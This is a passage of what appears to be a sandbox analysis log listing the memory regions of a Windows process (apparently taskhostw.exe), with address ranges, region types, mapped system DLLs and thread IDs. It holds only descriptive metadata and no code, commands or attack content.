entry_point = 0x0
region_type = private
name = "private_0x000000007ffe0000"
filename = ""
Region:
id = 1834
start_va = 0x7df5fffc0000
end_va = 0x7df5fffe2fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00007df5fffc0000"
filename = ""
Region:
id = 1835
start_va = 0x7df5ffff0000
end_va = 0x7ff5fffeffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00007df5ffff0000"
filename = ""
Region:
id = 1836
start_va = 0x7ff60b8b0000
end_va = 0x7ff60b8c8fff
monitored = 0
entry_point = 0x7ff60b8b59b0
region_type = mapped_file
name = "taskhostw.exe"
filename = "\\Windows\\System32\\taskhostw.exe" (normalized: "c:\\windows\\system32\\taskhostw.exe")
Region:
id = 1837
start_va = 0x7ff9fbe10000
end_va = 0x7ff9fbfd0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")
Region:
id = 1915
start_va = 0x400000
end_va = 0x6bffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000400000"
filename = ""
Region:
id = 1916
start_va = 0x7ff9f9c60000
end_va = 0x7ff9f9d0cfff
monitored = 0
entry_point = 0x7ff9f9c781a0
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")
Region:
id = 1917
start_va = 0x7ff9f8d90000
end_va = 0x7ff9f8f77fff
monitored = 0
entry_point = 0x7ff9f8dbba70
region_type = mapped_file
name = "kernelbase.dll"
filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")
Region:
id = 1918
start_va = 0x10000
end_va = 0x1ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000010000"
filename = ""
Region:
id = 1919
start_va = 0x7df5ffec0000
end_va = 0x7df5fffbffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00007df5ffec0000"
filename = ""
Region:
id = 1920
start_va = 0x100000
end_va = 0x1bdfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "locale.nls"
filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")
Region:
id = 1921
start_va = 0x7ff9f9410000
end_va = 0x7ff9f94acfff
monitored = 0
entry_point = 0x7ff9f94178a0
region_type = mapped_file
name = "msvcrt.dll"
filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")
Region:
id = 1922
start_va = 0x400000
end_va = 0x47ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000400000"
filename = ""
Region:
id = 1923
start_va = 0x5c0000
end_va = 0x6bffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000005c0000"
filename = ""
Region:
id = 1924
start_va = 0x7ff9fa230000
end_va = 0x7ff9fa34bfff
monitored = 0
entry_point = 0x7ff9fa2702b0
region_type = mapped_file
name = "rpcrt4.dll"
filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")
Region:
id = 1925
start_va = 0x7ff9f9ee0000
end_va = 0x7ff9fa15cfff
monitored = 0
entry_point = 0x7ff9f9fb4970
region_type = mapped_file
name = "combase.dll"
filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll")
Region:
id = 1999
start_va = 0x7ff9f8600000
end_va = 0x7ff9f8669fff
monitored = 0
entry_point = 0x7ff9f8636d50
region_type = mapped_file
name = "bcryptprimitives.dll"
filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll")
Region:
id = 2000
start_va = 0x7ff9f94b0000
end_va = 0x7ff9f9570fff
monitored = 0
entry_point = 0x7ff9f94d0da0
region_type = mapped_file
name = "oleaut32.dll"
filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll")
Region:
id = 2001
start_va = 0x480000
end_va = 0x4effff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000480000"
filename = ""
Region:
id = 2002
start_va = 0x20000
end_va = 0x26fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000020000"
filename = ""
Region:
id = 2003
start_va = 0x6c0000
end_va = 0x802fff
monitored = 0
entry_point = 0x6e8210
region_type = mapped_file
name = "ole32.dll"
filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")
Region:
id = 2004
start_va = 0x6c0000
end_va = 0x79cfff
monitored = 0
entry_point = 0x71e0b0
region_type = mapped_file
name = "rpcss.dll"
filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll")
Region:
id = 2005
start_va = 0x7ff9f8450000
end_va = 0x7ff9f845efff
monitored = 0
entry_point = 0x7ff9f8453210
region_type = mapped_file
name = "kernel.appcore.dll"
filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll")
Thread:
id = 158
os_tid = 0x56c
Thread:
id = 161
os_tid = 0x5b0